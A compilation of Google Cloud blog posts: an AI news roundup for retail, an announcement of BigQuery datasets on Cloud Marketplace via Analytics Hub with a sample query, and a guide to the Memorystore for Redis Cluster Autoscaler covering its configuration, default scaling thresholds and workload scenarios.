The National Retail Federation kicked off the year with their annual NRF conference, where Google Cloud showed how AI agents and AI-powered search are already helping retailers operate more efficiently, create personalized shopping experiences, and use AI to get the latest products and experiences to their customers. Check out our new AI tools to help retailers build gen AI search and agents.
As an example, Google Cloud worked with NVIDIA to empower retailers to boost their customer engagements in exciting new ways, deliver more hyper-personalized recommendations, and build their own AI applications and agents. Now with NVIDIA’s AI Enterprise software available on Google Cloud, retailers can handle more data and more complex AI tasks without their systems getting bogged down.
News you can use
This month, we shared several ways to better implement fast-moving AI, from a comprehensive guide on Supervised Fine Tuning (SFT), to how developers can help their LLMs deliver more accurate, relevant, and contextually aware responses, minimizing hallucinations and building trust in AI applications by optimizing their RAG retrieval.
We also published new documentation to use open models in Vertex AI Studio. Model selection isn’t limited to Google’s Gemini anymore. Now, choose models from Anthropic, Meta, and more when writing or comparing prompts.
Hear from our leaders
We closed out the month with The Prompt, our monthly column that brings observations from the field of AI. This month, we heard from Warren Barkley, AI product leader, who shares some best practices and essential guidance to help organizations successfully move AI pilots to production. Here’s a snippet:
More than 60% of enterprises are now actively using gen AI in production, helping to boost productivity and business growth, bolster security, and improve user experiences. In the last year alone, we witnessed a staggering 36x increase in Gemini API usage and a nearly 5x increase of Imagen API usage on Vertex AI — clear evidence that our customers are making the move towards bringing gen AI to their real-world applications.
Stay tuned for monthly updates on Google Cloud’s AI announcements, news, and best practices. For a deeper dive into the latest from Google Cloud, read our weekly updates, The Overwhelmed Person’s Guide to Google Cloud.
We are excited to announce the availability of datasets on Google Cloud Marketplace through BigQuery Analytics Hub, opening up new avenues for organizations to power innovative analytics use cases and procure data for enterprise business needs. As a centralized procurement platform, Google Cloud Marketplace offers access to a wide array of enterprise applications, foundational AI models, LLMs, and now, commercial and free datasets from third-party data providers and Google. BigQuery Analytics Hub enables cross-organizational zero-copy sharing at scale, with governance, security, and encryption all built in natively.
This deep integration between Google Cloud Marketplace and Analytics Hub not only simplifies data procurement for customers, but also helps data providers extend reach to a global audience and unlock additional business opportunities. Let’s delve into the various benefits this development brings.
Streamlined data procurement for customers
The introduction of BigQuery datasets on Google Cloud Marketplace offers numerous advantages for customers looking to access high-quality datasets to power analytics, AI and to optimize business applications. We offer a wide variety of datasets, including commercial data products from leading providers such as Dun & Bradstreet, Equifax, and Weather Source, a Pelmorex company. Data teams can now easily find, buy, and consume datasets from a centralized, comprehensive catalog — the same place where they discover generative AI, analytics and business applications that integrate with or run on Google Cloud. By simplifying the data discovery and procurement process, businesses can allocate their resources more efficiently, reduce administrative burden, and accelerate data and AI-driven initiatives. Datasets purchased from Google Cloud Marketplace can draw down the customer’s Google Cloud commitment.
Immediate access to purchased data
Upon purchasing a dataset, customers can gain instant access to it within their BigQuery environment through Analytics Hub. By subscribing to a purchased BigQuery dataset in Analytics Hub, a linked dataset is immediately created in the customer’s own Google Cloud project. This allows businesses to swiftly integrate procured data with their own data without requiring data movement or replication, expedite analytical processes, and accelerate time-to-value. By eliminating the delays commonly associated with data procurement and by streamlining data delivery time, organizations can quickly leverage the acquired data to inform strategic decisions and drive innovation.
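Because a linked dataset behaves like any other dataset in the subscriber’s project, it can be queried with standard BigQuery tooling as soon as the subscription is created. The following sketch uses the `google-cloud-bigquery` Python client; the project, dataset, and table names are hypothetical placeholders, not real Marketplace listings.

```python
# Hypothetical sketch: querying a linked dataset created by an Analytics Hub
# subscription. The linked dataset is a live pointer to the provider's shared
# data, so it is queried in place -- no copy lands in the subscriber project.

def build_query(project_id: str, linked_dataset: str, table: str) -> str:
    """Build a query against a table in a linked dataset.

    All identifiers here are placeholders for illustration.
    """
    return f"SELECT * FROM `{project_id}.{linked_dataset}.{table}` LIMIT 10"


def run_sample(project_id: str, query: str):
    """Execute the query. Requires the google-cloud-bigquery package and
    application-default credentials with access to the linked dataset."""
    from google.cloud import bigquery

    client = bigquery.Client(project=project_id)
    return [dict(row) for row in client.query(query).result()]


# Example (assumes a subscription already created a linked dataset named
# "weather_linked" in the project "my-project"):
query = build_query("my-project", "weather_linked", "daily_observations")
```

The only difference from querying a native dataset is who owns the underlying storage; access control and billing for query compute stay in the subscriber’s project.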
Cost control, security and governance
Customers procuring datasets through Google Cloud Marketplace can benefit significantly from cost savings, as linked datasets in Analytics Hub are live pointers to shared data and require no data copying, and there are no extra replication or storage costs to account for. In addition, customers can reduce billing sprawl with consolidated billing for Google Cloud services, third-party ISV solutions, and now datasets. A recent Google Cloud commissioned IDC study1 found that Google Cloud Marketplace can help customers lower spending on third-party solutions by 21.2% on average, largely due to avoiding unnecessary purchases, reducing duplicative spend, and leveraging committed spend discounts. Customers gain cost efficiencies and improved time-to-value opportunities by consolidating contracts across their entire organization.
On the security front, Google Cloud provides robust features to support data protection. Analytics Hub natively supports provider and subscriber project isolation, helping to ensure that commercial data can be safely shared across organizational boundaries. Customers can also apply specific security configurations via BigQuery and Analytics Hub, including Virtual Private Cloud Service Controls support, allowing for tailored access controls to help safeguard from unauthorized access.
Furthermore, organizations can maintain governance and control over the solutions in use by turning on the Google Cloud Private Marketplace capability, enabling a curated collection of trusted products — including datasets — that can be discovered, procured and used by their data analyst teams. With Private Marketplace, administrators can maintain control over which datasets are used, yet also ensure that governance controls do not hinder productivity by turning on the ability for end-users to request additional products be made available. The same IDC study found that managing third-party software purchases through Google Cloud Marketplace can result in 31% productivity gains for compliance teams1.
Data providers extend reach to customers
Data provider partners get significant advantages by listing their offerings on Google Cloud Marketplace, gaining access to a wider customer base, facilitating market expansion and business growth. With a streamlined onboarding process, data providers can create new revenue channels by efficiently making their datasets available to new customers.
Once the transaction is completed in Google Cloud Marketplace, Analytics Hub automatically enables customer access to the data provider’s data, minimizing friction for sellers and customers. In addition, the integration with Analytics Hub means data updates are propagated instantly, so that end users have access to the most current information, enhancing customer satisfaction and loyalty. Google Cloud Marketplace supports dataset transactions via the agency model, which at the time of this announcement is enabled for customers and partners based in France, Germany, the United Kingdom, and the United States.
Unlock monetization opportunities
Google Cloud Marketplace opens up various monetization opportunities for data provider partners. Those who already have data in BigQuery can quickly share at scale with Analytics Hub, commercialize, list, and unlock new income streams through Google Cloud Marketplace. Integration opportunities between Analytics Hub and Google Cloud Marketplace further enable partners to capitalize on the intrinsic value of their data, expanding their monetization strategies and maximizing revenue potential.
Partners have the flexibility to transact with customers via public, off-the-shelf pricing or through custom-negotiated private offers. They can set up fixed-fee subscriptions and customize payment schedules for data offerings without needing complex technical integrations, simplifying the process of generating revenue. Leverage Google Cloud’s standard agreements or provide your own. Finally, with Analytics Hub usage metrics and subscription management, data providers can easily analyze usage behavior, identify patterns, and add or revoke subscriptions, all within a single pane of glass. And if they execute campaigns to drive traffic to Google Cloud Marketplace dataset offerings, they can track traffic and conversion in the Analytics dashboard within Google Cloud Marketplace Producer Portal. Whether it’s through fixed subscriptions or through offering advanced data services, partners have numerous ways to monetize data effectively on our platform.
Data provider partners are excited about the business opportunities and customer use cases that BigQuery datasets on Google Cloud Marketplace can help deliver.
“Driving adoption of Dun & Bradstreet data through joint-go-to-market is a key pillar of our partnership with Google Cloud. We are excited about the ability for our mutual customers to seamlessly transact Dun & Bradstreet’s high-quality and trusted data on the Google Cloud Marketplace and immediately unlock powerful analytics and real-time insights. Having more of our AI-ready data on BigQuery helps organizations be deliberate about their data strategy.” – Isabel Gomez Vidal, Chief Revenue Officer, Dun & Bradstreet
“Our collaboration with Google Cloud to make Equifax data available on Google Cloud Marketplace and Analytics Hub represents a significant step forward in data accessibility. By leveraging this platform, our customers can now integrate Equifax insights seamlessly into their existing workflows, driving innovation and informed decision-making.” – Felipe Castillo, Chief Product Officer, US Information Solutions, Equifax
“We are proud to be an early adopter of the Google Cloud Marketplace and we are looking forward to building upon our initial success leveraging the integrated functionality in BigQuery. Google Cloud Marketplace has accelerated lead capturing, procurement, and delivery of our data assets, allowing our teams to focus on unlocking business opportunities with our mutual customers.” – Craig Stelmach, Senior Vice President of Business Development and Sales, Weather Source, a Pelmorex Company
Analytics Hub and Google Cloud Marketplace are helping to reshape the landscape of how customers and data providers make the most out of data to power the next generation of AI and enterprise use cases. Learn more about Analytics Hub and explore datasets on Google Cloud Marketplace.
One of the most compelling aspects of cloud computing is the ability to automatically scale resources up and, almost as importantly, to scale them back down to manage costs and performance. This is standard practice with virtual machines, for instance with Compute Engine Managed Instance Groups, but less common with stateful services such as databases, because of their inherent complexity.
Memorystore for Redis Cluster capacity is determined by the number of shards in your cluster, which can be increased/decreased without downtime, and your cluster’s shard size, which maps on to the underlying node type. At this time, the node type of the cluster is immutable. To scale capacity in or out, you modify the number of shards in your cluster. To automate this process, you can deploy the Memorystore Cluster Autoscaler to monitor your cluster metrics, and rightsize your cluster based on that information. The Autoscaler performs the necessary resource adjustments using rulesets that evaluate memory and CPU utilization, without impacting cluster availability.
The following chart shows the Autoscaler in action, with a Memorystore for Redis Cluster instance automatically scaling out as memory utilization increases. The green line represents data being written to the cluster at the rate of one gigabyte every five minutes. The blue line represents the number of shards in the cluster. You can see that the cluster scales out, with the number of shards increasing in proportion to the memory utilization, then plateaus when the writes stop, and finally scales back in when the keys are flushed at the end of the test.
Experience and deployment
To use the Autoscaler, deploy it to one of your Google Cloud projects. The Autoscaler is very flexible and there are multiple options for its deployment, so the repository contains multiple example Terraform deployment configurations, as well as documentation that describes the various deployment models.
Once you’ve deployed the Autoscaler, configure it according to the scaling requirements of the Memorystore instances being managed, to suit your workloads’ characteristics. You do this by setting Autoscaler configuration parameters for each of the Memorystore instances. Once configured, the Autoscaler autonomously manages and scales the Memorystore instances. You can read more about these parameters later in this post, and in the Autoscaler documentation.
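As a rough illustration, an Autoscaler configuration for a single Memorystore instance might look like the following. The field names here follow the parameters discussed in this post (projectId, instanceId, scalingProfile, scalingMethod, minSize, scaleOutCoolingMinutes, scaleInLimit); maxSize and the specific values are illustrative assumptions, so treat the Autoscaler documentation in the repository as the authoritative schema.

```json
{
  "projectId": "my-project",
  "instanceId": "my-memorystore-cluster",
  "scalingProfile": "CPU_AND_MEMORY",
  "scalingMethod": "LINEAR",
  "minSize": 3,
  "maxSize": 30,
  "scaleOutCoolingMinutes": 5,
  "scaleInLimit": 20
}
```

One such object is defined per managed instance, so a single Autoscaler deployment can manage several clusters with different scaling requirements.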
Autoscaler architecture
The Autoscaler consists of two main components, the Poller and the Scaler. You can deploy these to either Cloud Run functions or Google Kubernetes Engine (GKE) via Terraform, and configure them so that the Autoscaler runs according to a user-defined schedule. The Poller queries the Memorystore metrics in Cloud Monitoring at a pre-defined interval to determine utilization, and passes them to the Scaler. The Scaler then compares the metrics against the recommended thresholds specified in the rule set, and determines if the instance should be scaled in or out, and if so, by how many shards. You can modify the sample configuration to determine minimum and maximum cluster sizes and any other thresholds suitable for your environment.
Throughout the flow, the Autoscaler writes a step-by-step summary of its recommendations and actions to Cloud Logging for tracking and auditing, as well as metrics to Cloud Monitoring to provide insight into its actions.
Scaling rubrics
Memorystore performance is most commonly limited by in-memory storage and by CPU. The Autoscaler is configured by default to take both of these factors into consideration when scaling, by utilizing the CPU_AND_MEMORY profile. This is a good place to start your deployment, and can be replaced with a custom configuration, if required, to best suit your needs.
Defaults:

| Metric | Average default setting | Max default setting |
| --- | --- | --- |
| CPU scale OUT | CPU > 70% | Max CPU > 80% and average CPU > 50% |
| CPU scale IN | CPU < 50% * | Max CPU < 60% and average CPU < 40% * |
| Memory scale OUT | Usage > 70% | Max usage > 80% and average usage > 50% |
| Memory scale IN | Usage < 50% * | Max usage < 60% and average usage < 40% * |
* Scale-in will be blocked if there are ongoing key evictions, which occur when the keyspace is full and keys are removed from the cache to make room. Scale in is enabled by default, but can be configured using a custom scaling profile. Refer to the Scaling Profiles section of the documentation for more information on how to do this.
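These default rules can be sketched in a few lines of Python. This is an illustrative reading of the defaults above, not the Autoscaler's actual code: it assumes that scale-out triggers when either the CPU or the memory rule fires, and that scale-in requires both CPU and memory to be low and no ongoing evictions.

```python
# Illustrative sketch of the default CPU_AND_MEMORY rules (an interpretation
# of the table above, not the Autoscaler's real implementation).

def should_scale_out(avg_cpu, max_cpu, avg_mem, max_mem):
    """Scale out if either metric is hot: average above 70%, or a max above
    80% combined with an average above 50%."""
    cpu_hot = avg_cpu > 70 or (max_cpu > 80 and avg_cpu > 50)
    mem_hot = avg_mem > 70 or (max_mem > 80 and avg_mem > 50)
    return cpu_hot or mem_hot


def should_scale_in(avg_cpu, max_cpu, avg_mem, max_mem, evictions=False):
    """Scale in only when both metrics are cold and no keys are being
    evicted (evictions block scale-in, per the note above)."""
    if evictions:
        return False
    cpu_cold = avg_cpu < 50 or (max_cpu < 60 and avg_cpu < 40)
    mem_cold = avg_mem < 50 or (max_mem < 60 and avg_mem < 40)
    return cpu_cold and mem_cold
```

For example, a brief CPU spike to 85% with a 55% average triggers a scale-out even though the average stays under 70%, which is why spiky workloads may want larger thresholds, as discussed below.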
Scaling scenarios and methods
Let’s take a look at some typical scenarios and their specific utilization patterns, and the Autoscaler configurations best suited to each of them. You can read more about the options described in the following section in the configuration documentation.
Standard workloads
With many applications backed by Memorystore, users interact with the application at certain times of day more than others, in a regular pattern — think a banking application where users check their accounts in the morning, make transactions during the afternoon and early evening, but don’t use the application much at night.
We refer to this fairly typical scenario as a “standard workload” whose time series shows:
- Large utilization increase or decrease at certain points of the day
- Small spikes over and under the threshold
A recommended base configuration for these types of workflow should include:
- The LINEAR scalingMethod to cover large scale events
- A small value for scaleOutCoolingMinutes — between 5 and 10 minutes — to minimize the Autoscaler’s reaction time
Plateau workloads
Another common scenario is applications with more consistent utilization during the day such as global apps, games, or chat applications. User interactions with these applications are more consistent, so the jumps in utilization are less pronounced than for a standard workload.
These scenarios create a “plateau workload” whose time series shows:
- A pattern composed of various plateaus during the day
- Some larger spikes within the same plateau
A recommended base configuration for these types of workflow should include:
- The STEPWISE scalingMethod, with a stepSize sufficient to cover the largest utilization jump using only a few steps during a normal day, OR
- The LINEAR scalingMethod, if there is likely to be a considerable increase or reduction in utilization at certain times, for example when breaking news is shared. Use this method together with a scaleInLimit to avoid reducing the capacity of your instance too quickly
Batch workloads
Customers often need increased capacity for their Memorystore clusters to handle batch processes or a sales event, where the timing is usually known in advance. These scenarios comprise a “batch workload” with the following properties:
- A scheduled, well-known peak that requires additional compute capacity
- A drop in utilization when the process or event is over
A recommended base configuration for these types of workloads should include two separate scheduled jobs:
- One for the batch process or event, that includes an object in the configuration that uses the DIRECT scalingMethod, and a minSize value of the peak number of shards/nodes to cover the process or event
- One for regular operations, that includes configuration with the same projectId and instanceId, but using the LINEAR or STEPWISE method. This job will take care of decreasing the capacity when the process or event is over
Be sure to choose an appropriate scaling schedule so that the two configurations don’t conflict. For both Cloud Run functions and GKE deployments, make sure the batch operation starts before the Autoscaler starts to scale the instance back in again. You can use the scaleInLimit parameter to slow the scale-in operation down if needed.
Spiky workloads
Depending on load, it can take several minutes for Memorystore to update the cluster topology and fully utilize new capacity. Therefore, if your workload is characterized by very spiky traffic or sudden-onset load patterns, the Autoscaler might not be able to provision capacity quickly enough to avoid increased latency, or efficiently enough to yield cost savings.
For these spiky workloads, a base configuration should:
- Set a minSize that slightly over-provisions the usual instance workload
- Use the LINEAR scalingMethod, in combination with a scaleInLimit to avoid further latency when the spike is over
- Choose scaling thresholds large enough to smooth out some smaller spikes, while still being reactive to large ones
Advanced usage
As described above, the Autoscaler is preconfigured with scaling rules designed to optimize cluster size based on CPU and memory utilization. However, depending on your workload(s), you may find that you need to modify these rules to suit your utilization, performance and/or budget goals.
There are several ways to customize the rule sets that are used for scaling, in increasing order of effort required:
- Choose to scale on only memory or only CPU metrics. This can help if you find your clusters flapping, i.e., alternating rapidly between sizes. You can do this by specifying a scalingProfile of either CPU or MEMORY to override the default CPU_AND_MEMORY in the Autoscaler configuration.
- Use your own custom scaling rules by specifying a scalingProfile of CUSTOM, and supplying a custom rule set in the Autoscaler configuration as shown in the example here.
- Create your own custom rule sets and make them available for everyone in your organization to use as part of a scaling profile. You can do this by customizing one of the existing scaling profiles to suit your needs. We recommend starting by looking at the existing scaling rules and profiles, and creating your own customizations.
Next steps
The OSS Autoscaler comes with a Terraform configuration to get you started, which can be integrated into your codebase for production deployments. We recommend starting with non-production environments, and progressing through to production when you are confident with the behavior of the Autoscaler alongside your application(s). Some more tips for production deployments are here in the documentation.
If there are additional features you would like to see in the Autoscaler — or would like to contribute to it yourself — please don’t hesitate to raise an issue via the GitHub issues page. We’re looking forward to hearing from you.